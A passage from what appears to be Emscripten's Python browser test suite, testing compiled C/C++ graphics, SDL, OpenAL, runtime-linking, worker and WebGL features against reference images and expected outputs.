self.btest(Path('third_party/cubegeom', 'cubegeom_pre.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre.png'), args=['-s', 'USE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '-s', 'RELOCATABLE'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre2.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre2.png'), args=['-s', 'GL_DEBUG', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre3.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@parameterized({
'': ([],),
'tracing': (['-sTRACE_WEBGL_CALLS'],),
})
@requires_graphics_hardware
def test_cubegeom(self, args):
# proxy only in the simple, normal case (we can't trace GL calls when
# proxied)
self.btest(Path('third_party/cubegeom', 'cubegeom.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'] + args, also_proxied=not args)
@requires_graphics_hardware
def test_cubegeom_regal(self):
self.btest(Path('third_party/cubegeom', 'cubegeom.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-DUSE_REGAL', '-s', 'USE_REGAL', '-lGL', '-lSDL'], also_proxied=True)
@requires_threads
@requires_graphics_hardware
def test_cubegeom_regal_mt(self):
self.btest(Path('third_party/cubegeom', 'cubegeom.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-pthread', '-DUSE_REGAL', '-s', 'USE_PTHREADS', '-s', 'USE_REGAL', '-lGL', '-lSDL'], also_proxied=False)
@requires_graphics_hardware
def test_cubegeom_proc(self):
create_file('side.c', r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os']]:
self.btest(Path('third_party/cubegeom', 'cubegeom_proc.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_glew.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '--closure=1', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_color.c'), reference=Path('third_party/cubegeom', 'cubegeom_color.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_normal.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap_far(self): # indices do nto start from 0
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far_range.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_firefox('fails on CI but works locally')
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda_quad.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda_quad.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_mt.c'), reference=Path('third_party/cubegeom', 'cubegeom_mt.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_color2.c'), reference=Path('third_party/cubegeom', 'cubegeom_color2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_texturematrix.c'), reference=Path('third_party/cubegeom', 'cubegeom_texturematrix.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_fog.c'), reference=Path('third_party/cubegeom', 'cubegeom_fog.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre_vao.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre_vao.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'USE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre2_vao.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre2_vao2.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre2_vao2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre_vao_es.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_u4fv_2.c'), reference=Path('third_party/cubegeom', 'cubegeom_u4fv_2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
create_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
create_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION', '-s', 'GL_FFP_ONLY', '-lGL', '-lSDL'])
@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
shutil.copyfile(test_file('water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lGL'])
def test_openal_error(self):
for args in [
[],
['-lopenal', '-s', 'STRICT'],
['--closure=1']
]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
create_file('header.h', r'''
struct point {
int x, y;
};
''')
create_file('supp.c', r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point *p) {
printf("supp: %d,%d\n", p->x, p->y);
mainFunc(p->x + p->y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
''')
create_file('main.c', r'''
#include <stdio.h>
#include <assert.h>
#include "header.h"
extern void suppFunc(struct point *p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
assert(x == 56);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(&p);
printf("main see: %d\nok.\n", suppInt);
assert(suppInt == 76);
return 0;
}
''')
self.run_process([EMCC, 'supp.c', '-o', 'supp.wasm', '-s', 'SIDE_MODULE', '-O2'])
self.btest_exit('main.c', args=['-s', 'MAIN_MODULE=2', '-O2', 'supp.wasm'])
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
create_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
def test_mem_init(self):
self.set_setting('WASM_ASYNC_COMPILATION', 0)
create_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
create_file('post.js', '''
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
args = ['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1']
# with assertions, we notice when memory was written to too early
expected = 'abort:Assertion failed: native function `note` called before runtime initialization'
self.btest('mem_init.cpp', expected=expected, args=args)
# otherwise, we just overwrite
self.btest_exit('mem_init.cpp', args=args + ['-s', 'ASSERTIONS=0'])
def test_mem_init_request(self):
def test(what, status):
print(what, status)
create_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
maybeReportResultToServer('got_error');
}
console.log('WARNING: ' + x);
};
''')
self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
self.set_setting('EXIT_RUNTIME')
test('test.html.mem', 'exit:0')
test('nothing.nowhere', 'got_error')
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1: ' + e.toString());
assert(e.toString().indexOf('Assertion failed') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2: ' + e.toString());
assert(e.toString().indexOf('Assertion failed') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution
} catch(e) {
out('expected fail 3:' + e.toString());
assert(e.toString().indexOf('Assertion failed') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// Run on the next event loop, as code may run in a postRun right after main().
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 0);
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
''' % self.port
create_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [[], ['-s', 'WASM=0']]:
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
create_file('post.js', post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'EXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync startup, call too late')
create_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '-s', 'EXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync, runtime still alive, so all good')
create_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js'] + extra_args + mode, reporting=Reporting.NONE)
def test_cwrap_early(self):
self.btest(Path('browser/cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS', '--pre-js', test_file('browser/cwrap_early.js'), '-s', 'EXPORTED_RUNTIME_METHODS=[cwrap]'], expected='0')
def test_worker_api(self):
self.compile_btest([test_file('worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=_one'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
self.compile_btest([test_file('worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-O2', '--minify=0', '-s', 'EXPORTED_FUNCTIONS=_one,_two,_three,_four', '--closure=1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify=0'], expected='11')
def test_worker_api_3(self):
self.compile_btest([test_file('worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=_one'])
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
self.compile_btest([test_file('worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=_one', '-s', 'ASYNCIFY'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_with_pthread_compilation_fails(self):
self.run_process([EMCC, '-c', '-o', 'hello.o', test_file('hello_world.c')])
stderr = self.expect_fail([EMCC, 'hello.o', '-o', 'a.js', '-g', '--closure=1', '-s', 'USE_PTHREADS', '-s', 'BUILD_AS_WORKER=1'])
self.assertContained('error: USE_PTHREADS + BUILD_AS_WORKER require separate modes that don\'t work together, see https://github.com/emscripten-core/emscripten/issues/8854', stderr)
def test_emscripten_async_wget2(self):
self.btest_exit('test_emscripten_async_wget2.cpp')
@disabled('https://github.com/emscripten-core/emscripten/issues/15818')
def test_emscripten_async_wget2_data(self):
create_file('hello.txt', 'Hello Emscripten!')
self.btest('test_emscripten_async_wget2_data.cpp', expected='0')
def test_emscripten_async_wget_side_module(self):
self.run_process([EMCC, test_file('browser_module.c'), '-o', 'lib.wasm', '-O2', '-s', 'SIDE_MODULE'])
self.btest_exit('browser_main.c', args=['-O2', '-s', 'MAIN_MODULE=2'])
@parameterized({
'non-lz4': ([],),
'lz4': (['-s', 'LZ4'],)
})
def test_preload_module(self, args):
create_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
self.run_process([EMCC, 'library.c', '-s', 'SIDE_MODULE', '-O2', '-o', 'library.so'])
create_file('main.c', r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return Module['preloadedWasm']['/library.so'] !== undefined;
);
if (!found) {
return 1;
}
void *lib_handle = dlopen("/library.so", RTLD_NOW);
if (!lib_handle) {
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
return 3;
}
return 0;
}
''')
self.btest_exit(
'main.c',
args=['-s', 'MAIN_MODULE=2', '--preload-file', '.@/', '-O2', '--use-preload-plugins'] + args)
def test_mmap_file(self):
create_file('data.dat', 'data from the file ' + ('.' * 9000))
self.btest(test_file('mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'])
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compiles.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest_exit('hello_world_gles.c', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut', '-DANIMATE'])
def test_uuid(self):
# Run with ./runner browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using self.run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues doesn't get minified out.
self.run_process([EMCC, '-O2', '--closure=1', test_file('uuid/test.c'), '-o', 'test.js', '-luuid'])
test_js_closure = read_file('test.js')
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = self.run_js('test.js')
print(out)
# Tidy up files that might have been created by this test.
try_delete(test_file('uuid/test.js'))
try_delete(test_file('uuid/test.js.map'))
# Now run test in browser
self.btest_exit(test_file('uuid/test.c'), args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
create_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js'], expected='1')
@parameterized({
'': ([],),
'closure': (['-O2', '-g1', '--closure=1', '-s', 'HTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0'],),
'pthread': (['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],),
'legacy': (['-s', 'MIN_FIREFOX_VERSION=0', '-s', 'MIN_SAFARI_VERSION=0', '-s', 'MIN_IE_VERSION=0', '-s', 'MIN_EDGE_VERSION=0', '-s', 'MIN_CHROME_VERSION=0', '-Wno-transpile'],)
})
@requires_threads
def test_html5_core(self, opts):
self.btest(test_file('test_html5_core.c'), args=opts, expected='0')
@requires_threads
def test_html5_gamepad(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
print(opts)
self.btest_exit(test_file('test_gamepad.c'), args=[] + opts)
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest_exit(test_file('webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-s', 'FULL_ES2=1'], ['-s', 'USE_PTHREADS']]:
print(opts)
self.btest_exit(test_file('webgl_create_context.cpp'), args=opts + ['-lGL'])
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest_exit(test_file('webgl_create_context2.cpp'))
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
# (this only makes sense in the old deprecated -s DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=0 mode)
def test_html5_special_event_targets(self):
self.btest(test_file('browser/html5_special_event_targets.cpp'), args=['-lGL'], expected='0')
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest_exit(test_file('webgl_destroy_context.cpp'), args=opts + ['--shell-file', test_file('webgl_destroy_context_shell.html'), '-lGL'])
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest_exit(test_file('webgl_color_buffer_readpixels.cpp'), args=['-lGL'])
# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
@requires_graphics_hardware
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest_exit(test_file('webgl_shader_source_length.cpp'), args=opts + ['-lGL'])
# Tests calling glGetString(GL_UNMASKED_VENDOR_WEBGL).
@requires_graphics_hardware
def test_webgl_unmasked_vendor_webgl(self):
self.btest_exit(test_file('webgl_unmasked_vendor_webgl.c'), args=['-lGL'])
@requires_graphics_hardware
def test_webgl2(self):
for opts in [
['-s', 'MIN_CHROME_VERSION=0', '-Wno-transpile'],
['-O2', '-g1', '--closure=1', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'],
['-s', 'FULL_ES2=1'],
]:
print(opts)
self.btest_exit(test_file('webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + opts)
# Tests the WebGL 2 glGetBufferSubData() functionality.
@requires_graphics_hardware
def test_webgl2_get_buffer_sub_data(self):
self.btest_exit(test_file('webgl2_get_buffer_sub_data.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'])
@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
# test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
# (the testcase doesn't even use threads, but is compiled with thread support).
self.btest_exit(test_file('webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-s', 'USE_PTHREADS'])
@requires_graphics_hardware
def test_webgl2_objects(self):
self.btest_exit(test_file('webgl2_objects.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'])
@requires_graphics_hardware
def test_html5_webgl_api(self):
for mode in [['-s', 'OFFSCREENCANVAS_SUPPORT', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],
['-s', 'OFFSCREEN_FRAMEBUFFER', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],
[]]:
if 'OFFSCREENCANVAS_SUPPORT' in mode and os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'):
continue
self.btest_exit(test_file('html5_webgl.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + mode)
@requires_graphics_hardware
def test_webgl2_ubos(self):
self.btest_exit(test_file('webgl2_ubos.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'])
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest_exit(test_file('webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1'])
self.btest_exit(test_file('webgl2_garbage_free_entrypoints.cpp'))
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest_exit(test_file('webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'])
@requires_graphics_hardware
